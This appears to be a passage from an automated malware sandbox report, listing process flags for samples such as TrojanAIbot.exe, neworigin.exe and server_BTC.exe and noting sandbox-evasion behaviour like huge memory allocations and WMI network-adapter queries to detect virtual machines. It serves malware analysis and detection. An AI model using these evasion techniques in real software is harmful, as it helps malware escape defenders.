Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DA0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DA1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DCD000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DCE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2E24000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F1C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F1E000 memory commit 500015104
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DB0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DB1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DDD000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2DDE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2E34000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F2C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F2E000 memory commit 500015104
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: 2E60000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: 2E61000 memory commit 500178944	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: 2E8D000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: 2E8E000 memory commit 500350976	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: 2EE4000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: 2FDC000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Memory allocated: 2FDE000 memory commit 500015104	Jump to behavior

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 9E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 5180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: FC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2980000 memory reserve \| memory write watch
